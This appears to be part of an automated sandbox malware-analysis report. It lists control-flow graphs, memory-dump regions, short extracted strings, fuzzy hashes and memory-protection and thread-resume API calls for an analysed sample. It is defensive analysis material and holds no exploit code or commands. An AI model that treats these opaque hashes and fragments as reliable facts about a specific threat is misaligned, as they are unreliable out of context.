69c4b13-69c4b14 2928->2935 2934->2935 2935->2926 2948 69c4c7d-69c4c95 2945->2948 2949 69c4be4-69c4c7c 2945->2949 2946->2945 2948->2895 2949->2948 2957->2925 2958->2957
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: foq$h
                                          • API String ID: 0-619432838
                                          • Opcode ID: 28ce688db50bb7c6faac43034748b982ca563425be818937b8959a3d3f4d317a
                                          • Instruction ID: 3ca26ad4fcb7d53e0d4836005f1487dce5d3daf9f879bec0b05cbf6373e47296
                                          • Opcode Fuzzy Hash: 28ce688db50bb7c6faac43034748b982ca563425be818937b8959a3d3f4d317a
                                          • Instruction Fuzzy Hash: 0C71F875E00628CFEB54DF69C850AD9B7B2FF89310F1086AAD50DA7254DB306E85CFA1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2966 6e4e6c0-6e4e6e0 2967 6e4e6e7-6e4e6f9 2966->2967 2968 6e4e6e2 2966->2968 2970 6e4e6fb-6e4e6fe 2967->2970 2968->2967 2971 6e4e701-6e4e707 2970->2971 2972 6e4e710-6e4e711 2971->2972 2973 6e4e709 2971->2973 2978 6e4e78a-6e4e800 2972->2978 2973->2972 2974 6e4ea33-6e4eab5 2973->2974 2975 6e4e903-6e4e921 2973->2975 2976 6e4e713-6e4e785 2973->2976 2977 6e4eacf-6e4eb11 2973->2977 2973->2978 2974->2971 2996 6e4eabb-6e4eac3 2974->2996 2979 6e4e92d-6e4e988 2975->2979 2976->2971 2977->2971 2995 6e4eb17-6e4eb1f 2977->2995 2978->2970 2979->2971 2994 6e4e98e-6e4e996 2979->2994 2994->2971 2995->2971 2996->2971
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Bv0s$T(u+
                                          • API String ID: 0-3775074207
                                          • Opcode ID: 81849230122406650552ffc63c57caa6f1599ad102d57b52c7dea978c40cf9e2
                                          • Instruction ID: b99c13fbaef1f2b9f23f4ae2677aca4a9895b6fd6d853228e2c2860c59e91e47
                                          • Opcode Fuzzy Hash: 81849230122406650552ffc63c57caa6f1599ad102d57b52c7dea978c40cf9e2
                                          • Instruction Fuzzy Hash: 4571D874A01318DFDB94DF78D954BA9BBF2FB48310F1090A9E41AA7395DB35AA84CF01
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: 7e96c6e7685bb5a91983351b79da30dba51f4c97f543e66987ce1b98d22682a8
                                          • Instruction ID: 30fb9ec633048ae437bdb89f679caf22ff1c9d1941689dd0ef576756e4cee040
                                          • Opcode Fuzzy Hash: 7e96c6e7685bb5a91983351b79da30dba51f4c97f543e66987ce1b98d22682a8
                                          • Instruction Fuzzy Hash: 96021770A05218CFEB94DF6CD884B9AB7B6FB49300F1084AAD50DA7759DB34AD84CF60
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 069C77B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 4b1880eaeb68c4a6782023fdca99c76fa4d505e7ec8e04a980451ca744de57c5
                                          • Instruction ID: f3d5a565d5f099215ee70c8743c44f262df7eae5a6698edbc3817f55dc6fd142
                                          • Opcode Fuzzy Hash: 4b1880eaeb68c4a6782023fdca99c76fa4d505e7ec8e04a980451ca744de57c5
                                          • Instruction Fuzzy Hash: 5F21F3B1D012499FDB10DFAAD984AEEBBF5FF48310F20842AE419A7250CB759944CBA1
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 069C77B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 21930c62c740a70fd157779e93fdef0b7dc6fe7ffc6c052de5d397bcd0255d9d
                                          • Instruction ID: d76b4284782737ed16bd9ce1b55bb5b81350961e4bf3d7084e7d15ab533f891d
                                          • Opcode Fuzzy Hash: 21930c62c740a70fd157779e93fdef0b7dc6fe7ffc6c052de5d397bcd0255d9d
                                          • Instruction Fuzzy Hash: F921D4B1D013499FCB10DFAAD984ADEFBF5FF48310F20842AE519A7250C775A944CBA1
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 069C98F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 83a81fe8a41783d3dbd35c1eca6285d089ac53f6510077f33c6a51db6aabb44f
                                          • Instruction ID: 0536f535d800d672d4c5bf2f7a96ef4be80ab9dd7c345599709a87db24e65f7e
                                          • Opcode Fuzzy Hash: 83a81fe8a41783d3dbd35c1eca6285d089ac53f6510077f33c6a51db6aabb44f
                                          • Instruction Fuzzy Hash: 4A1127B1D002498ADB10DFAAC485AEFFBF4EF49320F50842AD419A3240CB78A944CFA1
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 069C98F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 81e415e8d17395ecd680cab82fa3c4507464a333766171808af23b4f7f744a7c
                                          • Instruction ID: 41aa0fb5156a0c6af335f709591430bc7ed1e6828370057c07ff27c35307bbd7
                                          • Opcode Fuzzy Hash: 81e415e8d17395ecd680cab82fa3c4507464a333766171808af23b4f7f744a7c
                                          • Instruction Fuzzy Hash: 8611E7B1D003498EDB10DFAAC484AAFFBF4EF49320F50842AD419A7250CB78A944CFA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PHjq
                                          • API String ID: 0-751881793
                                          • Opcode ID: 5dd9e58bde1bb553fe370bf8d7ad4e7a8e078f7e15de24bed25d0989de4d4b29
                                          • Instruction ID: 8f86d9e5512cd6e4a1025369b607c0721f51825239976cafaa8717f66483db8c
                                          • Opcode Fuzzy Hash: 5dd9e58bde1bb553fe370bf8d7ad4e7a8e078f7e15de24bed25d0989de4d4b29
                                          • Instruction Fuzzy Hash: B6C12470E04318CFEB90DFA8D984B9DBBF2FB49704F2090A9C409A7655DBB05985CF81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: ebc73fdf40c3e88eca8ab62207997d07e82958a3250bc30a3faf3dc73a3939d0
                                          • Instruction ID: a40f5d149f45528ccfe83ee1090e43a828b0608cb028c1b726ead0f3124d4030
                                          • Opcode Fuzzy Hash: ebc73fdf40c3e88eca8ab62207997d07e82958a3250bc30a3faf3dc73a3939d0
                                          • Instruction Fuzzy Hash: 34B1F470E05218CFEBA4CFAAD984B9DBBF6BB48304F2090A9D419E7755D7309985CF60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: cf6b5ddce42a1184e32ca136735dbce02b6e517ec38eaab551129db9c9bf5f64
                                          • Instruction ID: f5077094ebebefa2134592c7174de32fdeb4e5c00489b5d13208b467ab868d37
                                          • Opcode Fuzzy Hash: cf6b5ddce42a1184e32ca136735dbce02b6e517ec38eaab551129db9c9bf5f64
                                          • Instruction Fuzzy Hash: 60B1F4B0E05218CFEFA4CFAAD984B9DBBF6BB49300F2090A9D419A7655D7305D85CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: baf422d5106329b0d53924c41dec032cdefa658af150fb6b74979958e169ac97
                                          • Instruction ID: a45b853d2218cff65e0f5482a315d6493dfcbb086229f5b733d1cc248264eb2e
                                          • Opcode Fuzzy Hash: baf422d5106329b0d53924c41dec032cdefa658af150fb6b74979958e169ac97
                                          • Instruction Fuzzy Hash: 0952C574A046288FDB64DF28C984B9AB7B6FF89301F1081E9D50DA7355DB34AE85CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 718fb496679ae18d82f18f3169f909c135dd7281a594706799c3ed7a718145c5
                                          • Instruction ID: e1f5dddf5db3181ffbed7f9eabbe05c4886d82f55869e1eee66e6a884216b80f
                                          • Opcode Fuzzy Hash: 718fb496679ae18d82f18f3169f909c135dd7281a594706799c3ed7a718145c5
                                          • Instruction Fuzzy Hash: 5CA13774E05208CFDB94DFA9D444BAEBBF2FB89300F109069D419A7655DB34AD85CFA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d56eaa6809fc8f45db4b8fda7e2dd73004344e97a4b57177356a094ea481f579
                                          • Instruction ID: 38f7203173a7b64157a03a9458abfd58990dfdac375eb8bf78b5ce37ce63d259
                                          • Opcode Fuzzy Hash: d56eaa6809fc8f45db4b8fda7e2dd73004344e97a4b57177356a094ea481f579
                                          • Instruction Fuzzy Hash: 1981F874E00208DFDB44DF99D580AAEBBF6FF88310F10842AE419AB355DB34A945CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b1ad4f22ca2e6c4ea349dc4f77ffc529cead67ba0445ff11ddcfa3310b887b7
                                          • Instruction ID: a620a867c718646d5be17bef9220b2701b87dd9586eeffb38c85d9e3abbe8871
                                          • Opcode Fuzzy Hash: 9b1ad4f22ca2e6c4ea349dc4f77ffc529cead67ba0445ff11ddcfa3310b887b7
                                          • Instruction Fuzzy Hash: F481D574E00209DFDB44DF99D584AAEBBF6FF88310F10842AE419AB754DB34A945CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132942549.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_68f0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c0c9e5e3baa4239f1e6e6dfe8d1ff9e287515fa553bc37a95e0391fef27803e6
                                          • Instruction ID: 30e8fc5e2f6b6cc42d9209e44faef1bbb4711998bcab0adb382ff9c169bb7ddd
                                          • Opcode Fuzzy Hash: c0c9e5e3baa4239f1e6e6dfe8d1ff9e287515fa553bc37a95e0391fef27803e6
                                          • Instruction Fuzzy Hash: F8512175D056189BEB6CCF2B8D556DAFAF3AFC9300F14C0F9960CA6254EB744A818F40

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1406 6ca5d48-6ca5d70 1408 6ca5dbe-6ca5dcc 1406->1408 1409 6ca5d72-6ca5db9 1406->1409 1410 6ca5ddb 1408->1410 1411 6ca5dce-6ca5dd9 call 6ca3870 1408->1411 1457 6ca6215-6ca621c 1409->1457 1413 6ca5ddd-6ca5de4 1410->1413 1411->1413 1416 6ca5dea-6ca5dee 1413->1416 1417 6ca5ecd-6ca5ed1 1413->1417 1420 6ca621d-6ca6245 1416->1420 1421 6ca5df4-6ca5df8 1416->1421 1418 6ca5ed3-6ca5ee2 call 6ca1a98 1417->1418 1419 6ca5f27-6ca5f31 1417->1419 1436 6ca5ee6-6ca5eeb 1418->1436 1423 6ca5f6a-6ca5f90 1419->1423 1424 6ca5f33-6ca5f42 call 6ca1248 1419->1424 1432 6ca624c-6ca6276 1420->1432 1426 6ca5e0a-6ca5e68 call 6ca35b0 call 6ca4018 1421->1426 1427 6ca5dfa-6ca5e04 1421->1427 1453 6ca5f9d 1423->1453 1454 6ca5f92-6ca5f9b 1423->1454 1440 6ca5f48-6ca5f65 1424->1440 1441 6ca627e-6ca6294 1424->1441 1466 6ca62db-6ca6305 1426->1466 1467 6ca5e6e-6ca5ec8 1426->1467 1427->1426 1427->1432 1432->1441 1442 6ca5eed-6ca5f22 call 6ca5c18 1436->1442 1443 6ca5ee4 1436->1443 1440->1457 1468 6ca629c-6ca62d4 1441->1468 1442->1457 1443->1436 1459 6ca5f9f-6ca5fc7 1453->1459 1454->1459 1472 6ca6098-6ca609c 1459->1472 1473 6ca5fcd-6ca5fe6 1459->1473 1478 6ca630f-6ca6315 1466->1478 1479 6ca6307-6ca630d 1466->1479 1467->1457 1468->1466 1476 6ca609e-6ca60b7 1472->1476 1477 6ca6116-6ca6120 1472->1477 1473->1472 1499 6ca5fec-6ca5ffb call 6ca1070 1473->1499 1476->1477 1503 6ca60b9-6ca60c8 call 6ca1070 1476->1503 1481 6ca617d-6ca6186 1477->1481 1482 6ca6122-6ca612c 1477->1482 1479->1478 1485 6ca6316-6ca6353 1479->1485 1487 6ca6188-6ca61b6 call 6ca2dc0 call 6ca2de0 1481->1487 1488 6ca61be-6ca620b 1481->1488 1497 6ca612e-6ca6130 1482->1497 1498 6ca6132-6ca6144 1482->1498 1487->1488 1509 6ca6213 1488->1509 1504 6ca6146-6ca6148 1497->1504 1498->1504 1519 6ca5ffd-6ca6003 1499->1519 1520 6ca6013-6ca6028 1499->1520 1525 6ca60ca-6ca60d0 1503->1525 1526 6ca60e0-6ca60eb 1503->1526 1507 6ca614a-6ca614e 1504->1507 1508 6ca6176-6ca617b 1504->1508 1514 6ca616c-6ca616f 1507->1514 1515 6ca6150-6ca6169 1507->1515 1508->1481 1508->1482 1509->1457 1514->1508 1515->1514 1527 6ca6007-6ca6009 1519->1527 1528 6ca6005 1519->1528 1523 6ca602a-6ca6056 call 6ca1f10 1520->1523 1524 6ca605c-6ca6065 1520->1524 1523->1468 1523->1524 1524->1466 1533 6ca606b-6ca6092 1524->1533 1534 6ca60d2 1525->1534 1535 6ca60d4-6ca60d6 1525->1535 1526->1466 1536 6ca60f1-6ca6114 1526->1536 1527->1520 1528->1520 1533->1472 1533->1499 1534->1526 1535->1526 1536->1477 1536->1503
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hnq$Hnq$Hnq
                                          • API String ID: 0-1699790779
                                          • Opcode ID: a166b41a62e1bae6efedf4f116b74c95a2fe933353c6d7811775827a5d5ef52f
                                          • Instruction ID: 26ae35f63c9f5ca8a99b0fbe332ee2a116a2fa515d44f18621f203558682d182
                                          • Opcode Fuzzy Hash: a166b41a62e1bae6efedf4f116b74c95a2fe933353c6d7811775827a5d5ef52f
                                          • Instruction Fuzzy Hash: 6C124B30A003059FCB64DFA5C894A6EBBF2FF84304F14856DD50A9B795DB35E946CBA0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1547 6cac160-6cac170 1548 6cac289-6cac2ae 1547->1548 1549 6cac176-6cac17a 1547->1549 1551 6cac2b5-6cac2c6 1548->1551 1550 6cac180-6cac189 1549->1550 1549->1551 1553 6cac18f-6cac1b6 1550->1553 1554 6cac2e1-6cac317 1550->1554 1559 6cac2ce-6cac2d7 1551->1559 1563 6cac27e-6cac288 1553->1563 1564 6cac1bc-6cac1be 1553->1564 1572 6cac31e-6cac335 1554->1572 1569 6cac358-6cac374 1559->1569 1570 6cac2d9 1559->1570 1566 6cac1df-6cac1e1 1564->1566 1567 6cac1c0-6cac1c3 1564->1567 1573 6cac1e4-6cac1e8 1566->1573 1571 6cac1c9-6cac1d3 1567->1571 1567->1572 1589 6cac398-6cac3af 1569->1589 1590 6cac376-6cac38a 1569->1590 1574 6cac2da-6cac2db 1570->1574 1575 6cac266-6cac26e 1570->1575 1571->1572 1578 6cac1d9-6cac1dd 1571->1578 1572->1559 1588 6cac337-6cac355 1572->1588 1579 6cac1ea-6cac1f9 1573->1579 1580 6cac249-6cac255 1573->1580 1576 6cac2dc 1574->1576 1575->1576 1587 6cac271-6cac278 1575->1587 1576->1554 1578->1566 1578->1573 1579->1572 1591 6cac1ff-6cac246 1579->1591 1580->1572 1582 6cac25b-6cac262 1580->1582 1582->1575 1587->1563 1587->1564 1588->1569 1599 6cac4a0-6cac4b0 1589->1599 1600 6cac3b5-6cac49b call 6ca7980 call 6ca7388 * 2 call 6ca79c0 call 6cab198 call 6ca7388 call 6caa330 call 6ca8228 1589->1600 1667 6cac38d call 6cac878 1590->1667 1668 6cac38d call 6cac9d9 1590->1668 1591->1580 1596 6cac393 1598 6cac5c3-6cac5ce 1596->1598 1610 6cac5fd-6cac61e call 6ca7ad0 1598->1610 1611 6cac5d0-6cac5e0 1598->1611 1608 6cac59e-6cac5ba call 6ca7388 1599->1608 1609 6cac4b6-6cac590 call 6ca7980 * 2 call 6ca8138 call 6ca7388 * 2 call 6ca7638 call 6ca7ad0 call 6ca7388 1599->1609 1600->1599 1608->1598 1663 6cac59b 1609->1663 1664 6cac592 1609->1664 1621 6cac5e2-6cac5e8 1611->1621 1622 6cac5f0-6cac5f8 call 6ca8228 1611->1622 1621->1622 1622->1610 1663->1608 1664->1663 1667->1596 1668->1596
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nq$(nq$Hnq
                                          • API String ID: 0-1151833592
                                          • Opcode ID: d19fd6fff03a3034890e3313c1b0d72ca4928ebfffff0f6c3608c93f8e10dfad
                                          • Instruction ID: a7d9e65c90f4e3aefee72a847fdf72e390f2a567d4c8bf2116421a8f6d994b17
                                          • Opcode Fuzzy Hash: d19fd6fff03a3034890e3313c1b0d72ca4928ebfffff0f6c3608c93f8e10dfad
                                          • Instruction Fuzzy Hash: 18F15434A01309DFCB44EFA4D5949ADBBB2FF89314F118569E806AB365DB30ED42CB91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1669 6ca7b78-6ca7bb5 1671 6ca7bd7-6ca7bed call 6ca7980 1669->1671 1672 6ca7bb7-6ca7bba 1669->1672 1678 6ca7f63-6ca7f77 1671->1678 1679 6ca7bf3-6ca7bff 1671->1679 1783 6ca7bbc call 6ca84e8 1672->1783 1784 6ca7bbc call 6ca8490 1672->1784 1674 6ca7bc2-6ca7bc4 1674->1671 1676 6ca7bc6-6ca7bce 1674->1676 1676->1671 1688 6ca7fb7-6ca7fc0 1678->1688 1680 6ca7d30-6ca7d37 1679->1680 1681 6ca7c05-6ca7c08 1679->1681 1682 6ca7d3d-6ca7d46 1680->1682 1683 6ca7e66-6ca7ea0 call 6ca7388 1680->1683 1685 6ca7c0b-6ca7c14 1681->1685 1682->1683 1687 6ca7d4c-6ca7e58 call 6ca7388 call 6ca7918 call 6ca7388 1682->1687 1787 6ca7ea3 call 6caa320 1683->1787 1788 6ca7ea3 call 6caa330 1683->1788 1689 6ca7c1a-6ca7c2e 1685->1689 1690 6ca8058 1685->1690 1780 6ca7e5a 1687->1780 1781 6ca7e63-6ca7e64 1687->1781 1693 6ca7fc2-6ca7fc9 1688->1693 1694 6ca7f85-6ca7f8e 1688->1694 1702 6ca7d20-6ca7d2a 1689->1702 1703 6ca7c34-6ca7cc9 call 6ca7980 * 2 call 6ca7388 call 6ca7918 call 6ca79c0 call 6ca7a68 call 6ca7ad0 1689->1703 1692 6ca805d-6ca8061 1690->1692 1699 6ca806c 1692->1699 1700 6ca8063 1692->1700 1697 6ca7fcb-6ca800e call 6ca7388 1693->1697 1698 6ca8017-6ca801e 1693->1698 1694->1690 1696 6ca7f94-6ca7fa6 1694->1696 1716 6ca7fa8-6ca7fad 1696->1716 1717 6ca7fb6 1696->1717 1697->1698 1705 6ca8043-6ca8056 1698->1705 1706 6ca8020-6ca8030 1698->1706 1708 6ca806d 1699->1708 1700->1699 1702->1680 1702->1685 1759 6ca7ccb-6ca7ce3 call 6ca7a68 call 6ca7388 call 6ca7638 1703->1759 1760 6ca7ce8-6ca7d1b call 6ca7ad0 1703->1760 1705->1692 1706->1705 1719 6ca8032-6ca803a 1706->1719 1708->1708 1785 6ca7fb0 call 6caaad0 1716->1785 1786 6ca7fb0 call 6caaac1 1716->1786 1717->1688 1719->1705 1728 6ca7ea9-6ca7f5a call 6ca7388 1728->1678 1759->1760 1760->1702 1780->1781 1781->1683 1783->1674 1784->1674 1785->1717 1786->1717 1787->1728 1788->1728
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'jq$4'jq$4'jq
                                          • API String ID: 0-3078559419
                                          • Opcode ID: d3701e6f396bad9eba21469817698a5085fc76560c3e096874d7994db4be45e2
                                          • Instruction ID: 9fe1d7a9564532cf8ae215156629c8156f2db96a08e6254dc71b00709111385e
                                          • Opcode Fuzzy Hash: d3701e6f396bad9eba21469817698a5085fc76560c3e096874d7994db4be45e2
                                          • Instruction Fuzzy Hash: CDF1EB34B11219DFCB44DF64D998A9DBBB2FF88304F118158E906AB3A5DB70ED42CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133069233.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'jq$4'jq
                                          • API String ID: 0-1204115232
                                          • Opcode ID: 3e0f54cb01adb2fe3f3fc3bba6cc7d1ccd84aabef103cdabb78c07ad999880f1
                                          • Instruction ID: e316a9542948c3ce58c942b4075ec0c05398e925feb883b6217bb7ebf9f61c83
                                          • Opcode Fuzzy Hash: 3e0f54cb01adb2fe3f3fc3bba6cc7d1ccd84aabef103cdabb78c07ad999880f1
                                          • Instruction Fuzzy Hash: 44420534E04209CFEB54DFA8D4586BEB7B6FF88300F21845AD912AB654D734AE42DF91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2526 69529d0-69529eb 2527 69529ed-69529f8 2526->2527 2528 69529ff-6952a28 2527->2528 2529 69529fa-69529fb 2527->2529 2530 6952a49 2528->2530 2531 6952a2a-6952a33 2528->2531 2536 69529fd-69529fe 2529->2536 2537 69529af-69529c9 call 69529bd 2529->2537 2535 6952a4c-6952a50 2530->2535 2533 6952a35-6952a38 2531->2533 2534 6952a3a-6952a3d 2531->2534 2538 6952a47 2533->2538 2534->2538 2539 6952e07-6952e1e 2535->2539 2536->2528 2537->2527 2548 69529cb-69529cf 2537->2548 2538->2535 2544 6952a55-6952a59 2539->2544 2545 6952e24-6952e28 2539->2545 2546 6952a5e-6952a62 2544->2546 2547 6952a5b-6952ab8 2544->2547 2549 6952e5d-6952e61 2545->2549 2550 6952e2a-6952e5a 2545->2550 2552 6952a64-6952a88 2546->2552 2553 6952a8b-6952aaf 2546->2553 2559 6952abd-6952ac1 2547->2559 2560 6952aba-6952b2b 2547->2560 2548->2526 2554 6952e63-6952e6c 2549->2554 2555 6952e82 2549->2555 2550->2549 2552->2553 2553->2539 2557 6952e73-6952e76 2554->2557 2558 6952e6e-6952e71 2554->2558 2556 6952e85-6952e8b 2555->2556 2566 6952e80 2557->2566 2558->2566 2563 6952ac3-6952ae7 2559->2563 2564 6952aea-6952b11 2559->2564 2568 6952b30-6952b34 2560->2568 2569 6952b2d-6952b8a 2560->2569 2563->2564 2589 6952b21-6952b22 2564->2589 2590 6952b13-6952b19 2564->2590 2566->2556 2572 6952b36-6952b5a 2568->2572 2573 6952b5d-6952b81 2568->2573 2578 6952b8c-6952be8 2569->2578 2579 6952b8f-6952b93 2569->2579 2572->2573 2573->2539 2591 6952bed-6952bf1 2578->2591 2592 6952bea-6952c4c 2578->2592 2582 6952b95-6952bb9 2579->2582 2583 6952bbc-6952bbf 2579->2583 2582->2583 2599 6952bc7-6952bdf 2583->2599 2589->2539 2590->2589 2594 6952bf3-6952c17 2591->2594 2595 6952c1a-6952c32 2591->2595 2601 6952c51-6952c55 2592->2601 2602 6952c4e-6952cb0 2592->2602 2594->2595 2611 6952c34-6952c3a 2595->2611 2612 6952c42-6952c43 2595->2612 2599->2539 2604 6952c57-6952c7b 2601->2604 2605 6952c7e-6952c96 2601->2605 2613 6952cb5-6952cb9 2602->2613 2614 6952cb2-6952d14 2602->2614 2604->2605 2622 6952ca6-6952ca7 2605->2622 2623 6952c98-6952c9e 2605->2623 2611->2612 2612->2539 2616 6952ce2-6952cfa 2613->2616 2617 6952cbb-6952cdf 2613->2617 2624 6952d16-6952d78 2614->2624 2625 6952d19-6952d1d 2614->2625 2633 6952cfc-6952d02 2616->2633 2634 6952d0a-6952d0b 2616->2634 2617->2616 2622->2539 2623->2622 2635 6952d7d-6952d81 2624->2635 2636 6952d7a-6952dd3 2624->2636 2627 6952d46-6952d5e 2625->2627 2628 6952d1f-6952d43 2625->2628 2644 6952d60-6952d66 2627->2644 2645 6952d6e-6952d6f 2627->2645 2628->2627 2633->2634 2634->2539 2638 6952d83-6952da7 2635->2638 2639 6952daa-6952dcd 2635->2639 2646 6952dd5-6952df9 2636->2646 2647 6952dfc-6952dff 2636->2647 2638->2639 2639->2539 2644->2645 2645->2539 2646->2647 2647->2539
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133069233.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'jq$4'jq
                                          • API String ID: 0-1204115232
                                          • Opcode ID: 502582ff5dc991bb72f60032dc2dbd169e810102959153c2e86d52b904a0d448
                                          • Instruction ID: 9521f39dc4672171167bac92a1b46fd39e7593b9c2b22119082289d2f33934b7
                                          • Opcode Fuzzy Hash: 502582ff5dc991bb72f60032dc2dbd169e810102959153c2e86d52b904a0d448
                                          • Instruction Fuzzy Hash: 02F1E534D01208DFDB94DFA4D4986ACBBB6FF89315F20446AE806A7390DB34AE85CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
